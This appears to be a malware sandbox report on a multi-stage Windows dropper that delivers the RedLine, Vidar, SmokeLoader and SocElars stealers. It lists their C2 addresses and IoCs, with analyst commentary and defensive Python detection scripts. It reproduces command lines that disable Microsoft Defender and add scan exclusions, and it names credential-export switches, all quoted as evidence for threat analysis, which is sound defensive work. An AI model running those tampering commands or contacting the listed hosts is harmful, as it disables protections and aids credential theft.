Analysis
- max time kernel: 145s
- max time network: 163s
- platform: windows10_x64
- resource: win10-en-20211208
- submitted: 23/12/2021, 13:27
- static task: static1
General
- Target: 5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba.exe
- Size: 6.8MB
- MD5: 19a783e43f4d7b841ef4a678b6cab04b
- SHA1: 02cda91e2213d13c82ab5cfd0a3c0a56b2cfb3b9
- SHA256: 5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba
- SHA512: 2cfc3315d04dd045f4d3b5e47300b395118fa7dbf4243a9555087c03feb81650f6c5d5d46ecdc99ab44e42cc3f76827fc9f83e65bc5b789de6aa1e078bf03e04
Malware Config

Extracted: socelars
- C2: http://www.biohazardgraphics.com/

Extracted: vidar
- version: 49.2
- botnet: 915
- C2 profile pages (Vidar reads its actual C2 address from the text of these social-media profiles):
  - https://mstdn.social/@kipriauk9
  - https://qoto.org/@kipriauk8
- profile_id: 915

Extracted: smokeloader
- version: 2020
- C2:
  - http://rcacademy.at/upload/
  - http://e-lanpengeonline.com/upload/
  - http://vjcmvz.cn/upload/
  - http://galala.ru/upload/
  - http://witra.ru/upload/

Extracted: redline
- botnet: media22ns
- C2: 65.108.69.168:13293

Extracted: redline
- botnet: userv1
- C2: 159.69.246.184:13127
Signatures

Process spawned unexpected child process (1 IoC)
This typically indicates the parent process was compromised via an exploit or macro.
- Parent C:\Windows\system32\wbem\wmiprvse.exe (PID 3876) is not expected to spawn rundll32.exe (PID 4696, procid 134)
WmiPrvSE.exe is also the parent of any process started through WMI (Win32_Process Create), which in a multi-stage dropper like this one is a more likely explanation than an exploit; the rundll32.exe instance is not in the part of the process tree shown below.
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.

RedLine Payload (20 IoCs)
All hits are yara rule family_redline on memory dumps, grouped here by PID (dump index and address range):
- 4560: 318, 320, 321 (0x0000000000400000-0x0000000000420000); 319 (0x0000000000419336, mapping)
- 4644: 324 (0x0000000000400000-0x0000000000420000); 326 (0x000000000041932A, mapping)
- 5148: 421 (0x0000000000350000-0x00000000004D9000)
- 4012: 418, 441 (0x0000000000EA0000-0x0000000001068000)
- 4608: 423, 436 (0x0000000000C60000-0x0000000000E28000)
- 4820: 422, 435 (0x0000000000DA0000-0x0000000000F68000)
- 4504: 419, 434 (0x00000000000E0000-0x00000000002A8000)
- 3984: 420, 433 (0x0000000000D70000-0x0000000000F37000)
- 5140: 417, 431 (0x00000000003D0000-0x0000000000597000)
- 2740: 416 (0x0000000000330000-0x00000000004B9000)
PIDs 4560 and 4644 are the hollowed second instances of Thu077e2e75cb9448.exe and Thu079294186b.exe (see "Suspicious use of SetThreadContext" below); the payload sits at 0x400000, the default image base of a 32-bit executable. PIDs 2740, 3984, 4504 and 4012 are the downloaded sFngh8kJcCuAm8jysMbjEirC.exe, ZG2ZCE1830yF8VzewG31eXYv.exe, 1QpswqGMmr8jFRGiU0y1mg0u.exe and 20OlplmYlG0taOb1yrJZjz73.exe in the process tree. PIDs 4608, 4820, 5140 and 5148 do not appear in the part of the process tree shown.
SmokeLoader
Modular backdoor trojan in use since 2014.

Socelars Payload (2 IoCs)
- behavioral2/files/0x000500000001ab30-198.dat  family_socelars
- behavioral2/files/0x000500000001ab30-166.dat  family_socelars
Suricata alerts
- suricata: ET MALWARE GCleaner Downloader Activity M5
- suricata: ET MALWARE JS/Nemucod requesting EXE payload 2016-02-01
- suricata: ET MALWARE JS/Nemucod.M.gen downloading EXE payload
- suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
- suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
- suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
- suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin
- suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
NirSoft WebBrowserPassView (3 IoCs)
Password recovery tool for various web browsers.
- behavioral2/files/0x000500000001ab25-160.dat  WebBrowserPassView
- behavioral2/files/0x000500000001ab25-204.dat  WebBrowserPassView
- behavioral2/memory/4540-316-0x0000000000400000-0x000000000047C000-memory.dmp  WebBrowserPassView

Nirsoft (6 IoCs)
- behavioral2/files/0x000500000001ab25-160.dat  Nirsoft
- behavioral2/files/0x000500000001ab25-204.dat  Nirsoft
- behavioral2/files/0x000600000001ab38-289.dat  Nirsoft
- behavioral2/files/0x000600000001ab38-290.dat  Nirsoft
- behavioral2/memory/4192-291-0x0000000000400000-0x0000000000455000-memory.dmp  Nirsoft
- behavioral2/memory/4540-316-0x0000000000400000-0x000000000047C000-memory.dmp  Nirsoft
Both memory hits are the dropped 11111.exe (PIDs 4192 and 4540, children of Thu0759a981db.exe). Its command lines in the process tree are NirSoft's headless switches: /stab <file> writes the recovered data as a tab-separated text file, and /CookiesFile <db> /scookiestxt <file> exports Chrome's cookie database. The stealer bundles legitimate NirSoft tools rather than implementing credential recovery itself.

Vidar Stealer (2 IoCs)
- behavioral2/memory/1196-255-0x0000000000400000-0x00000000008B0000-memory.dmp  family_vidar
- behavioral2/memory/1196-257-0x0000000000EA0000-0x0000000000F75000-memory.dmp  family_vidar
PID 1196 is Thu0733ed8a825a025a.exe, which later runs the self-delete chain ending in "del C:\ProgramData\*.dll" (Vidar stages the browser DLLs it needs in ProgramData and removes them afterwards).

Packed with ASPack (yara rule aspack_v212_v242, 6 IoCs)
- behavioral2/files/0x000500000001ab19-126.dat  aspack_v212_v242
- behavioral2/files/0x000500000001ab19-127.dat  aspack_v212_v242
- behavioral2/files/0x000500000001ab1a-125.dat  aspack_v212_v242
- behavioral2/files/0x000500000001ab1a-132.dat  aspack_v212_v242
- behavioral2/files/0x000600000001ab1c-133.dat  aspack_v212_v242
- behavioral2/files/0x000600000001ab1c-134.dat  aspack_v212_v242
Downloads MZ/PE file

Executes dropped EXE (36 IoCs)
- 504 setup_installer.exe
- 688 setup_install.exe
- 1248 Thu079294186b.exe
- 596 Thu07591e8932000a1.exe
- 3388 Thu0785d39bed3127.exe
- 3020 Thu0758285c76.exe
- 1196 Thu0733ed8a825a025a.exe
- 1476 Thu07d03cbff47c.exe
- 2308 Thu07f9ae12c2bc.exe
- 3960 Thu0786f9df93.exe
- 3124 Thu073b8d0217a8b45b.exe
- 3548 Thu0758285c76.exe
- 1276 Thu0759a981db.exe
- 1868 Thu077e2e75cb9448.exe
- 64 Thu0782554cbdd5d.exe
- 2108 Thu07ee83176e465e.exe
- 1392 Thu0730ece8e29065b7.exe
- 2472 Thu0784ab7efb72.exe
- 2468 Thu0784ab7efb72.exe
- 3588 Thu0785d39bed3127.tmp
- 2144 Thu0785d39bed3127.exe
- 8 Thu0785d39bed3127.tmp
- 4192 11111.exe
- 4432 windllhost.exe
- 4488 k195ieHUpMQS9BkZhyv36wqb.exe
- 4540 11111.exe
- 4620 rE0s2I5YsAkrhL0rwm2cMGMH.exe
- 4528 Thu079294186b.exe
- 4560 Thu077e2e75cb9448.exe
- 4644 Thu079294186b.exe
- 5020 oya9N3Li2HXd9xHDwHicTRmV.exe
- 4248 MFufgG4RPPu9X3FVrkyUMnoO.exe
- 4216 MTyK4gskUw6YvSYsi0YlrPO4.exe
- 5032 YNibrz7xz5HGgHLpNO730UWR.exe
- 4328 CRDSMHIqt6CbyEhVfbmL7kwQ.exe
- 4968 LMxXWBiVFvBjbrtWzyP_wXTD.exe
Checks computer location settings (2 TTPs, 2 IoCs)
Looks up the country code configured in the registry, likely a geofence.
- Key value queried: \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\International\Geo\Nation  (Thu07d03cbff47c.exe)
- Key value queried: \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000\Control Panel\International\Geo\Nation  (Thu0782554cbdd5d.exe)
Thu0782554cbdd5d.exe is the stage that fetches and runs the "Adobe Films" payloads in the process tree, so the set of second-stage samples obtained depends on the sandbox's configured country.

Loads dropped DLL (15 IoCs)
- 688 setup_install.exe (x6)
- 3588 Thu0785d39bed3127.tmp
- 8 Thu0785d39bed3127.tmp
- 4168 rundll32.exe (x2)
- 4272 rundll32.exe (x2)
- 1196 Thu0733ed8a825a025a.exe (x2)
- 3936 rundll32.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.

Accesses cryptocurrency files/wallets, possible credential harvesting (2 TTPs)

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 (1 TTP)
See the mstdn.social and qoto.org profile URLs in the Vidar configuration above.
Looks up external IP address via web service (6 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
- flow 32: ip-api.com
- flow 66: ipinfo.io
- flow 67: ipinfo.io
- flow 70: ipinfo.io
- flow 324: ipinfo.io
- flow 325: ipinfo.io

Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.

Suspicious use of SetThreadContext (3 IoCs)
- PID 2472 (Thu0784ab7efb72.exe) set thread context of PID 2468 (procid 95)
- PID 1868 (Thu077e2e75cb9448.exe) set thread context of PID 4560 (procid 128)
- PID 1248 (Thu079294186b.exe) set thread context of PID 4644 (procid 131)
In all three cases the target is a second instance of the same executable that the source had just launched (see the process tree), which is the RunPE/process-hollowing sequence: start a suspended copy of yourself, overwrite its image, point its main thread at the new entry point. PIDs 4560 and 4644 are the processes whose memory matched the RedLine yara rule.
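Matching SetThreadContext events against memory yara hits is the quickest way to say which hollowed child carries which payload. The Python below is an added example for this report, not sandbox code: the three events, the PID-to-image rows and the yara resource names are copied from the tables on this page, the correlation logic and the record layout are mine.

```python
"""Correlate SetThreadContext events with memory yara hits to spot process hollowing.

Added example for this report, not part of the sandbox output. The events, the
PID-to-image map and the yara resources are copied from the report's tables.
"""
import re
from collections import defaultdict

# (source pid, target pid, source image) from "Suspicious use of SetThreadContext"
SET_THREAD_CONTEXT = [
    (2472, 2468, "Thu0784ab7efb72.exe"),
    (1868, 4560, "Thu077e2e75cb9448.exe"),
    (1248, 4644, "Thu079294186b.exe"),
]

# pid -> image, the relevant rows of "Executes dropped EXE"
PROCESSES = {
    2472: "Thu0784ab7efb72.exe", 2468: "Thu0784ab7efb72.exe",
    1868: "Thu077e2e75cb9448.exe", 4560: "Thu077e2e75cb9448.exe",
    1248: "Thu079294186b.exe", 4528: "Thu079294186b.exe", 4644: "Thu079294186b.exe",
}

# (resource, rule) from the "RedLine Payload" and "Vidar Stealer" signatures
MEMORY_YARA = [
    ("behavioral2/memory/4560-318-0x0000000000400000-0x0000000000420000-memory.dmp", "family_redline"),
    ("behavioral2/memory/4560-319-0x0000000000419336-mapping.dmp", "family_redline"),
    ("behavioral2/memory/4644-324-0x0000000000400000-0x0000000000420000-memory.dmp", "family_redline"),
    ("behavioral2/memory/1196-255-0x0000000000400000-0x00000000008B0000-memory.dmp", "family_vidar"),
]

DEFAULT_IMAGE_BASE_X86 = 0x400000  # linker default for 32-bit EXEs

# <pid>-<dump index>-0x<start>[-0x<end>]-(memory|mapping).dmp
RESOURCE_RE = re.compile(
    r"memory/(?P<pid>\d+)-\d+-0x(?P<start>[0-9A-Fa-f]+)"
    r"(?:-0x(?P<end>[0-9A-Fa-f]+))?-(?P<kind>memory|mapping)\.dmp"
)


def parse_memory_hit(resource):
    """Return (pid, start, end) for one yara resource name; end is None for a mapping dump."""
    m = RESOURCE_RE.search(resource)
    if not m:
        raise ValueError(f"unrecognised resource name: {resource}")
    end = int(m["end"], 16) if m["end"] else None
    return int(m["pid"]), int(m["start"], 16), end


def hollowing_candidates(events, processes, yara_hits):
    """One record per SetThreadContext event whose source and target run the same image.

    Launching a copy of yourself and then setting that copy's thread context is
    the RunPE sequence; the yara hits on the target say what was written into it.
    """
    hits = defaultdict(list)
    for resource, rule in yara_hits:
        pid, start, end = parse_memory_hit(resource)
        hits[pid].append((rule, start, end))

    records = []
    for src, dst, image in events:
        if processes.get(dst) != image:
            continue  # cross-image injection is a different pattern; not handled here
        regions = [(s, e) for _, s, e in hits[dst] if e is not None]
        records.append({
            "parent": src,
            "child": dst,
            "image": image,
            "families": sorted({rule for rule, _, _ in hits[dst]}),
            "regions": regions,
            "payload_at_default_image_base": any(s == DEFAULT_IMAGE_BASE_X86 for s, _ in regions),
        })
    return records


if __name__ == "__main__":
    for rec in hollowing_candidates(SET_THREAD_CONTEXT, PROCESSES, MEMORY_YARA):
        print(rec)
```

PID 2468 comes out with no family: the report has no yara hit on it, even though it was hollowed in exactly the same way and its child later runs the self-delete chain. That is a gap to fill by dumping the process yourself, not evidence that it was benign. Note also that the "Suspicious use of WriteProcessMemory" list is capped at 64 rows and never reaches the writes into 2468, 4560 or 4644, so the SetThreadContext table is the only place the injection is visible.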
Drops file in Program Files directory (3 IoCs)
- File created: C:\Program Files (x86)\FarLabUninstaller\is-PS0KN.tmp  (Thu0785d39bed3127.tmp)
- File opened for modification: C:\Program Files (x86)\FarLabUninstaller\unins000.dat  (Thu0785d39bed3127.tmp)
- File created: C:\Program Files (x86)\FarLabUninstaller\unins000.dat  (Thu0785d39bed3127.tmp)
is-XXXXX.tmp and unins000.dat are Inno Setup artifacts; Thu0785d39bed3127.tmp is the Inno Setup stub that Thu0785d39bed3127.exe unpacks and re-executes.

Drops file in Windows directory (1 IoC)
- File created: C:\Windows\AppCompat\Programs\Amcache.hve.tmp  (WerFault.exe)
This is normal Windows Error Reporting activity after a crash, not a malware drop.

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s). The sandbox's generic description calls this likely ransomware behaviour, but nothing else in this report (no file encryption, no ransom note) supports that reading for this sample.

Program crash (4 IoCs)
- WerFault.exe PID 4416 for crashed PID 3124 (procid 92)
- WerFault.exe PID 4532 for crashed PID 5020 (procid 139)
- WerFault.exe PID 3052 for crashed PID 1276 (procid 93)
- WerFault.exe PID 6020 for crashed PID 3548 (procid 183)
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
- Key queried: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  (Thu0786f9df93.exe)
- Key enumerated: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  (Thu0786f9df93.exe)
- Key opened: \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI  (Thu0786f9df93.exe)

Checks processor information in registry (2 TTPs, 2 IoCs)
Processor information is often read in order to detect sandboxing environments.
- Key opened: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0  (Thu0733ed8a825a025a.exe)
- Key value queried: \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString  (Thu0733ed8a825a025a.exe)

Creates scheduled task(s) (1 TTP, 2 IoCs)
Schtasks is often used by malware for persistence or to perform post-infection execution.
- 2184 schtasks.exe
- 6964 schtasks.exe

Kills process with taskkill (3 IoCs)
- 4712 taskkill.exe  (taskkill /f /im chrome.exe, launched by Thu07f9ae12c2bc.exe: closing the browser releases its lock on the credential and cookie databases before they are read)
- 7128 taskkill.exe  (taskkill /im Thu0733ed8a825a025a.exe /f, part of that sample's self-delete chain)
- 4704 taskkill.exe  (taskkill /im "Thu0784ab7efb72.exe" /f, part of that sample's self-delete chain)

Modifies registry class (7 IoCs)
- Key created: \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings  (Thu07ee83176e465e.exe)
- Key created: \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings  (Thu0730ece8e29065b7.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{MEDLD6HQ-HMC1-A72R-W7DD-6QKQNAKGDK16}  (rundll32.exe)
- Set value (int): \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{MEDLD6HQ-HMC1-A72R-W7DD-6QKQNAKGDK16}\1 = "2303"  (rundll32.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{LKUSM4YW-RLK6-V57D-W2PM-7MZYLOJMUR24}  (rundll32.exe)
- Key created: \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance  (Process not Found)
- Key created: \REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance  (Process not Found)
The two CLSIDs written by rundll32.exe are not GUIDs: they have the 8-4-4-4-12 shape but contain letters outside 0-9A-F, so COM will never resolve them as classes. They are being used as a hidden storage or marker location under a key that blends in with thousands of real ones, and they make a precise host-based indicator.
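A shape-only check (eight characters, dash, four, dash, ...) passes these keys, which is presumably the point. The Python below is an added example for this report, not sandbox code: the registry rows are copied from the table above, the hexadecimal GUID check and the grouping by process are mine.

```python
"""Flag CLSID registry keys whose GUID is not actually a GUID.

Added example for this report, not part of the sandbox output. The (operation,
key path, process) rows are copied from the "Modifies registry class" table.
"""
import re

REGISTRY_EVENTS = [
    ("Key created", r"\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings", "Thu07ee83176e465e.exe"),
    ("Key created", r"\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\Local Settings", "Thu0730ece8e29065b7.exe"),
    ("Key created", r"\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{MEDLD6HQ-HMC1-A72R-W7DD-6QKQNAKGDK16}", "rundll32.exe"),
    ("Set value (int)", r'\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{MEDLD6HQ-HMC1-A72R-W7DD-6QKQNAKGDK16}\1 = "2303"', "rundll32.exe"),
    ("Key created", r"\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{LKUSM4YW-RLK6-V57D-W2PM-7MZYLOJMUR24}", "rundll32.exe"),
    ("Key created", r"\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance", "Process not Found"),
    ("Key created", r"\REGISTRY\USER\S-1-5-21-369956170-74428499-1628131376-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance", "Process not Found"),
]

# A real GUID is 8-4-4-4-12 hexadecimal digits.
GUID_RE = re.compile(r"^\{[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}\}$", re.IGNORECASE)
# The naive check many scripts use: right lengths, any characters. It accepts the fakes.
SHAPE_ONLY_RE = re.compile(r"^\{[^-]{8}(?:-[^-]{4}){3}-[^-]{12}\}$")
CLSID_IN_PATH_RE = re.compile(r"\\CLSID\\(\{[^\\}]*\})", re.IGNORECASE)


def clsid_in_path(key_path):
    """The {...} component directly under a CLSID key, or None if the path has none."""
    m = CLSID_IN_PATH_RE.search(key_path)
    return m.group(1) if m else None


def is_valid_guid(candidate):
    return GUID_RE.match(candidate) is not None


def malformed_clsids(events):
    """Map each fake CLSID to the set of processes that touched it."""
    out = {}
    for _operation, path, process in events:
        clsid = clsid_in_path(path)
        if clsid and not is_valid_guid(clsid):
            out.setdefault(clsid, set()).add(process)
    return out


if __name__ == "__main__":
    for clsid, procs in malformed_clsids(REGISTRY_EVENTS).items():
        print(f"{clsid}  shape ok: {bool(SHAPE_ONLY_RE.match(clsid))}  "
              f"hex ok: {is_valid_guid(clsid)}  touched by: {sorted(procs)}")
```

The same check works on a live host by walking HKLM\SOFTWARE\Classes\CLSID and HKCU\Software\Classes\CLSID; anything that fails the hexadecimal test is worth a look, since no legitimate registration produces such a name.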
Script User-Agent (1 IoC)
Uses a user-agent string associated with a script host/environment.
- flow 35: HTTP User-Agent header "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)"
This is the default User-Agent of the WinHttp.WinHttpRequest COM object, i.e. an HTTP request issued from VBScript or JScript rather than from a browser.

Suspicious behavior: EnumeratesProcesses (64 IoCs)
- 3960 Thu0786f9df93.exe (x2)
- 2760 powershell.exe (x2)
- 1808 powershell.exe (x2)
- 3040 Process not Found (all remaining entries)

Suspicious behavior: MapViewOfSection (1 IoC)
- 3960 Thu0786f9df93.exe
Suspicious use of AdjustPrivilegeToken (64 IoCs)
- 596 Thu07591e8932000a1.exe: SeDebugPrivilege
- 2308 Thu07f9ae12c2bc.exe: SeCreateTokenPrivilege, SeAssignPrimaryTokenPrivilege, SeLockMemoryPrivilege, SeIncreaseQuotaPrivilege, SeMachineAccountPrivilege, SeTcbPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeCreatePermanentPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeAuditPrivilege, SeSystemEnvironmentPrivilege, SeChangeNotifyPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeSyncAgentPrivilege, SeEnableDelegationPrivilege, SeManageVolumePrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege, and LUIDs 31, 32, 33, 34, 35
- 1248 Thu079294186b.exe: SeDebugPrivilege
- 1868 Thu077e2e75cb9448.exe: SeDebugPrivilege
- 3124 Thu073b8d0217a8b45b.exe: SeDebugPrivilege
- 2760 powershell.exe: SeDebugPrivilege
- 1808 powershell.exe: SeDebugPrivilege
- 3040 Process not Found: SeShutdownPrivilege and SeCreatePagefilePrivilege, alternating, for the remaining entries
The list for PID 2308 is privilege LUIDs 2 through 35 in numeric order: the sample loops over every privilege value and calls AdjustTokenPrivileges for each, which is the lazy "enable everything" pattern and only succeeds for privileges the token already holds. LUIDs 31-35, which the report leaves unnamed, are SeTrustedCredManAccessPrivilege, SeRelabelPrivilege, SeIncreaseWorkingSetPrivilege, SeTimeZonePrivilege and SeCreateSymbolicLinkPrivilege. SeDebugPrivilege on the three RedLine loaders and on the two powershell.exe instances is what the SetThreadContext and Defender-tampering steps need.
Suspicious use of FindShellTrayWindow (1 IoC)
- 8 Thu0785d39bed3127.tmp  (the Inno Setup stub; ordinary for an installer)

Suspicious use of WriteProcessMemory (64 IoCs)
Each row is "writer PID (image) -> target PID (procid)" with the number of writes the sandbox logged:
- 3176 (5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba.exe) -> 504 (69) x3
- 504 (setup_installer.exe) -> 688 (70) x3
- 688 (setup_install.exe) -> 3560 (73) x3, 3720 (74) x3, 740 (75) x3, 2880 (76) x3, 1760 (77) x3, 1528 (81) x3, 1776 (78) x3, 668 (79) x3, 368 (82) x3, 676 (84) x3, 3664 (108) x3, 352 (103) x3, 2396 (86) x2
- 3560 (cmd.exe) -> 2760 (83) x3
- 3720 (cmd.exe) -> 1808 (112) x3
- 1760 (cmd.exe) -> 596 (80) x2
- 740 (cmd.exe) -> 1248 (107) x3
- 2880 (cmd.exe) -> 3388 (105) x3
- 1528 (cmd.exe) -> 3020 (106) x3
- 1776 (cmd.exe) -> 1196 (85) x3
The list is capped at 64 entries, so later launches are not shown. Every pair here is a parent writing into a child it has just created, which CreateProcess itself does while setting up the new process, so this signature is background noise in this report. The injection that matters is under "Suspicious use of SetThreadContext".
Processes
PIDs are reused during this run (740 is both a cmd.exe and EpuZ4h5YgR9ln1Xlr3Z3v9uI.exe; 3548 is both YmGxiEquxv5xodShM0zeXz36.exe and the second Thu0758285c76.exe), so correlate on PID plus image and time, not on PID alone. The number in brackets is the process-tree depth.

[1] C:\Users\Admin\AppData\Local\Temp\5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba.exe  (PID 3176)
    cmd: "C:\Users\Admin\AppData\Local\Temp\5c416961f6d7c90d805c17130cd7ceb38c76125a38e923bedfc54bc98afd46ba.exe"
    - Suspicious use of WriteProcessMemory
  [2] C:\Users\Admin\AppData\Local\Temp\setup_installer.exe  (PID 504)
      cmd: "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
      - Executes dropped EXE
      - Suspicious use of WriteProcessMemory
    [3] C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\setup_install.exe  (PID 688)
        cmd: "C:\Users\Admin\AppData\Local\Temp\7zS8F1BCFA5\setup_install.exe"
        - Executes dropped EXE
        - Loads dropped DLL
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 3560)
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 2760)
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 3720)
          cmd: C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
          - Suspicious use of WriteProcessMemory
        [5] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  (PID 1808)
            cmd: powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
            - Suspicious behavior: EnumeratesProcesses
            - Suspicious use of AdjustPrivilegeToken
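The two cmd.exe to powershell.exe pairs above are the installer's first action after unpacking: switch off Defender real-time protection, sample submission and cloud (MAPS) reporting, then exclude its own staging directory from scanning. The Python below is an added example for this report, not sandbox output: it flags such command lines, using the two lines copied from this tree plus constructed controls, one of which hides the same change behind -EncodedCommand, which a literal string match would miss. The rule names and function names are my own.

```python
"""Detect Microsoft Defender tampering in process command lines.

Added example for this report, not part of the sandbox output. The first two
command lines are copied verbatim from the process tree; the others are
constructed controls.
"""
import base64
import re

REPORT_CMDLINES = [
    # copied from the report (cmd.exe PID 3560 -> powershell.exe PID 2760)
    r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none '
    r'-NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true '
    r'-SubmitSamplesConsent NeverSend -MAPSReporting Disable',
    # copied from the report (cmd.exe PID 3720 -> powershell.exe PID 1808)
    r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none '
    r'-NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"',
    # constructed benign control: reads the setting, changes nothing
    r'powershell -Command Get-MpPreference | Select-Object DisableRealtimeMonitoring',
]

# Constructed control: the same real-time-protection change hidden behind -EncodedCommand.
ENCODED_SAMPLE = "powershell -nop -w hidden -enc " + base64.b64encode(
    "Set-MpPreference -DisableRealtimeMonitoring $true".encode("utf-16-le")
).decode("ascii")

# A quoted or bare value following a parameter name.
VALUE = r"(\"[^\"]*\"|'[^']*'|\S+)"

# (regex, meaning); each regex captures the value being set so the finding explains itself.
RULES = [
    (r"set-mppreference\b.*?-disablerealtimemonitoring\s+(\$?true|1)\b", "real-time protection disabled"),
    (r"set-mppreference\b.*?-disablebehaviormonitoring\s+(\$?true|1)\b", "behavior monitoring disabled"),
    (r"set-mppreference\b.*?-disableioavprotection\s+(\$?true|1)\b", "download (IOAV) scanning disabled"),
    (r"set-mppreference\b.*?-submitsamplesconsent\s+(neversend|2)\b", "sample submission disabled"),
    (r"set-mppreference\b.*?-mapsreporting\s+(disabled?|0)\b", "cloud (MAPS) reporting disabled"),
    (r"add-mppreference\b.*?-exclusionpath\s+" + VALUE, "exclusion path added"),
    (r"add-mppreference\b.*?-exclusionprocess\s+" + VALUE, "process exclusion added"),
    (r"add-mppreference\b.*?-exclusionextension\s+" + VALUE, "extension exclusion added"),
]


def expand_encoded_command(cmdline):
    """Append the decoded payload of a -e/-ec/-enc/-EncodedCommand argument, if any.

    PowerShell accepts any unambiguous prefix of EncodedCommand, and the payload
    is base64 over UTF-16LE, so the literal cmdlet names are not on the command line.
    """
    m = re.search(r"(?<!\S)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})", cmdline, re.IGNORECASE)
    if not m:
        return cmdline
    try:
        decoded = base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return cmdline
    return f"{cmdline} {decoded}"


def find_defender_tampering(cmdline):
    """Return human-readable findings for one command line (empty list if clean)."""
    text = " ".join(expand_encoded_command(cmdline).split())  # collapse whitespace
    if not re.search(r"(set|add)-mppreference", text, re.IGNORECASE):
        return []
    findings = []
    for pattern, meaning in RULES:
        m = re.search(pattern, text, re.IGNORECASE)
        if m:
            findings.append(f"{meaning}: {m.group(1)}")
    return findings


def triage(cmdlines):
    """Map each suspicious command line to its findings; clean lines are dropped."""
    return {c: f for c in cmdlines if (f := find_defender_tampering(c))}


if __name__ == "__main__":
    for line, findings in triage(REPORT_CMDLINES + [ENCODED_SAMPLE]).items():
        print(line[:80] + ("..." if len(line) > 80 else ""))
        for finding in findings:
            print("   ", finding)
```

Set-MpPreference and Add-MpPreference need local administrator rights, and with Tamper Protection enabled the real-time-monitoring change is rejected; an added exclusion is a separate control and worth alerting on regardless. Pair a command-line match with Defender's own log (Microsoft-Windows-Windows Defender/Operational, event 5001 for real-time protection disabled) to confirm whether the change took effect, and remember that PowerShell also accepts unique parameter prefixes such as -DisableRealtime, which these literal patterns do not cover.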
      [4] C:\Windows\SysWOW64\cmd.exe  (PID 740)
